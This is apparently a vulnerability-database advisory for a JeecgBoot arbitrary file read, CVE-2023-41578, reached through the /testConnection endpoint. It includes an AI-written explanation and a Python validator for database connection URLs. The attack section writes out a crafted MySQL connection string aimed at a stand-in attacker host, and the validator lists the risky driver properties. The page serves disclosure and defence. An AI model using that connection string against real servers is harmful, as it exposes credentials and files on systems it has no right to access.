VYPR
High severity · NVD Advisory · Published Sep 8, 2023 · Updated Sep 26, 2024

CVE-2023-41578

Description

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

JeecgBoot up to v3.5.3 allows unauthenticated arbitrary file read via a crafted MySQL connection string passed to the /testConnection endpoint.

Vulnerability

Description

CVE-2023-41578 is an arbitrary file read vulnerability in JeecgBoot versions up to v3.5.3. The flaw is in the /testConnection endpoint, which is used to test database connections. The application builds a JDBC connection string from user-supplied input without sanitization, so the connection can be pointed at an attacker-controlled MySQL server with connection properties that let the MySQL Connector/J driver read local files from the JeecgBoot host via the LOAD DATA LOCAL INFILE mechanism or similar features.

Attack Vector

An attacker can exploit this by sending a crafted POST request to /testConnection with a malicious dbUrl parameter: a MySQL connection string that points at an attacker-controlled server and enables the properties needed to read arbitrary files from the JeecgBoot host (e.g., jdbc:mysql://attacker.com/test?allowLoadLocalInfile=true&autoDeserialize=true). The attack requires no authentication and can be performed remotely wherever the application is reachable. The GitHub issue [2] provides a detailed proof-of-concept.

Impact

Successful exploitation allows an attacker to read sensitive files from the server, such as configuration files, credentials, or application source code, potentially leading to further compromise of the system. The vulnerability is categorized as high severity due to the ease of exploitation and the potential for data disclosure.

Mitigation

As of the advisory, JeecgBoot has not released an official patch for this specific version. Users are advised to upgrade to a later version (e.g., v3.5.4 or higher) once available, or restrict access to the /testConnection endpoint to trusted networks. The vulnerability has been publicly disclosed, and exploitation may be possible if the application remains unpatched [1][3].
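One defensive check for the dbUrl input described above, added here as an example and not JeecgBoot's own code: it rejects connection URLs whose host is outside an operator-configured allowlist or which carry the Connector/J properties that enable client-side file reads or deserialization. The allowlist and the exact property set are assumptions for illustration.

```python
"""Validate a user-supplied JDBC MySQL URL before it is ever handed to the driver.

Added example, not JeecgBoot code. Assumes the URL arrives in the ``dbUrl``
parameter named in the advisory and that the operator maintains a host allowlist.
"""
from urllib.parse import parse_qsl, urlsplit

# Connector/J properties that let a rogue MySQL server pull files off the client
# or trigger Java deserialization. None of them belongs in an operator-entered URL.
# (Assumed set for illustration; extend it to match the driver version in use.)
DANGEROUS_PROPERTIES = {
    "allowloadlocalinfile",
    "allowloadlocalinfileinpath",
    "allowurlinlocalinfile",
    "autodeserialize",
    "queryinterceptors",
    "statementinterceptors",
}

# Constructed allowlist: the only database hosts this deployment may connect to.
ALLOWED_DB_HOSTS = {"db.internal.example", "127.0.0.1"}


def check_jdbc_url(db_url: str, allowed_hosts=ALLOWED_DB_HOSTS) -> list[str]:
    """Return the reasons to reject db_url; an empty list means it is acceptable."""
    reasons = []
    if not db_url.startswith("jdbc:mysql://"):
        # Fail closed on every other scheme (mysqlx, replication, non-MySQL drivers).
        return ["only jdbc:mysql:// URLs are accepted"]
    # Drop the "jdbc:" prefix so urlsplit parses the rest as an ordinary URL.
    parts = urlsplit(db_url[len("jdbc:"):])
    # hostname excludes any user@ prefix and port; multi-host lists such as
    # "a,b" do not match an allowlist entry and are therefore rejected.
    if parts.hostname not in allowed_hosts:
        reasons.append(f"host {parts.hostname!r} is not in the allowlist")
    # Compare property names case-insensitively so odd capitalisation cannot slip through.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in DANGEROUS_PROPERTIES:
            reasons.append(f"property {key}={value!r} is not permitted")
    return reasons
```

The same function can be run over request logs for /testConnection to flag historical attempts, since it needs nothing but the URL string.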

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: org.jeecgframework.boot:jeecg-boot-parent (Maven)
Affected versions: <= 3.5.3
Patched versions: none listed

Affected products: 1

Patches: 0
No patches discovered yet.

Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0
No linked articles in our index yet.